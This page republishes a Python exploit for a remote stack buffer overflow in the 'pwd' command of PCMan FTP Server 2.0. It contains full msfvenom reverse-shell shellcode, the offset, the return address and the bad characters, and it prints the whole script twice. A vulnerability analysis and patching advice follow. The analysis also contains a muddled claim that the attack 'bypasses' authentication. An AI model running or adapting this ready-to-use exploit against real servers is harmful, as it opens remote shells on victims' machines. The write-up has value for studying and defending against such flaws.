PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow

Exploit Author: Waqas Ahmed Faroouqi Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2024-02-02 
# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3

#!/usr/bin/python

import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444

overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"                                                                                           
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"                                                                                                             
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"                                                                                                             
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"                                                                                                             
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"                                                                                                             
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"                                                                                                             
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"                                                                                                             
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")

shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow

# Change IP/Port as required  

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
        print "\nSending evil buffer..."
        s.connect(('192.168.146.135',21))
        data = s.recv(1024)
        s.send('USER anonymous' +'\r\n')
        data = s.recv(1024)
        s.send('PASS anonymous\r\n')
        s.send('pwd ' + shellcode + '\r\n')
        s.close()
        print "\nExploit completed successfully!."
except:
        print "Could not connect to FTP!"


PCMan FTP Server 2.0 – 'pwd' Remote Buffer Overflow Vulnerability Analysis

The PCMan FTP Server 2.0 has been identified as a critical security risk due to a remote buffer overflow vulnerability triggered by the pwd command. This flaw, discovered by cybersecurity researcher Waqas Ahmed Faroouqi (ZEROXINN), allows attackers to execute arbitrary code on the target system, potentially leading to full system compromise. The vulnerability was verified on Windows XP SP3, highlighting the ongoing risks associated with outdated and poorly maintained software.

Understanding the Vulnerability

Buffer overflow vulnerabilities occur when a program fails to properly validate input length, allowing an attacker to overflow a fixed-size buffer with malicious data. In this case, the pwd command—used to retrieve the current directory path—does not implement proper bounds checking. When a long string is passed as an argument, it overflows the allocated buffer, corrupting adjacent memory regions.

Exploitation is particularly dangerous because the pwd command is typically used by authenticated users, meaning attackers can leverage it after logging in. This bypasses initial authentication barriers, making the exploit more stealthy and effective.

Exploit Mechanism

The exploit leverages a stack-based buffer overflow, targeting the server’s stack memory during the processing of the pwd command. The attacker constructs a payload that includes:

  • A shellcode segment designed to open a reverse shell.
  • A padding sequence (e.g., 'A' * 2007) to fill the buffer and reach the return address.
  • A return address that redirects execution to the shellcode.
  • NOP sleds (0x90 * 32) to increase the chance of successful execution.

This structure ensures that when the buffer overflows, the instruction pointer (EIP) is overwritten with a controlled value, redirecting execution to the malicious code.

Exploit Code Breakdown


#!/usr/bin/python

import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444

overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" 
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" 
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" 
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" 
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" 
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" 
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" 
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")

shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow

# Change IP/Port as required 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
 print "\nSending evil buffer..."
 s.connect(('192.168.146.135',21))
 data = s.recv(1024)
 s.send('USER anonymous' +'\r\n')
 data = s.recv(1024)
 s.send('PASS anonymous\r\n')
 s.send('pwd ' + shellcode + '\r\n')
 s.close()
 print "\nExploit completed successfully!."
except:
 print "Could not connect to FTP!"

Explanation:

The script establishes a TCP connection to the FTP server on port 21. After connecting, it performs a standard login sequence using anonymous credentials. Once authenticated, it sends the pwd command with the crafted shellcode payload.

The shellcode is constructed as follows:

  • 2007 'A' characters: This fills the buffer to reach the overwrite point.
  • \x53\x93\x42\x7e: This is the return address pointing to a function in USER32.dll, which is a reliable location in Windows XP’s memory space.
  • \x90 * 32: NOP sleds increase the likelihood of successful execution by providing a buffer zone where the CPU can "slide" into the shellcode.
  • overflow: The actual shellcode generated via msfvenom, designed to create a reverse TCP connection to a listener.

This payload is carefully crafted to avoid bad characters such as \x00 (null), \x0a (LF), and \x0d (CR), which can terminate strings or disrupt parsing.

Real-World Impact and Risk Assessment

Although PCMan FTP Server 2.0 is a legacy tool, its presence in certain environments—such as isolated industrial systems, embedded devices, or outdated network infrastructures—poses a significant risk. Attackers can exploit this vulnerability to:

  • Gain remote access to the system.
  • Execute arbitrary commands.
  • Steal sensitive data.
  • Deploy malware or establish persistent backdoors.

Due to the lack of modern security features (e.g., ASLR, DEP), Windows XP systems are especially vulnerable to such exploits. This highlights the importance of patching, upgrading, and decommissioning legacy software.

Security Recommendations

For organizations using PCMan FTP Server or similar outdated tools:

  • Immediate removal from production environments.
  • Network segmentation to isolate vulnerable systems.
  • Firewall rules to block access to port 21 from untrusted sources.
  • Regular vulnerability scanning using tools like Nessus or OpenVAS.
  • Adopt secure alternatives such as SFTP (SSH-based) or modern FTP servers with security patches.

Conclusion

The PCMan FTP Server 2.0 'pwd' buffer overflow is a textbook example of how poor input validation can lead to catastrophic security failures. It serves as a stark reminder that even seemingly benign commands can become attack vectors if not properly secured. Cybersecurity professionals must remain vigilant, especially when dealing with legacy systems. The exploitation of such vulnerabilities underscores the need for proactive security hygiene, continuous monitoring, and timely software updates.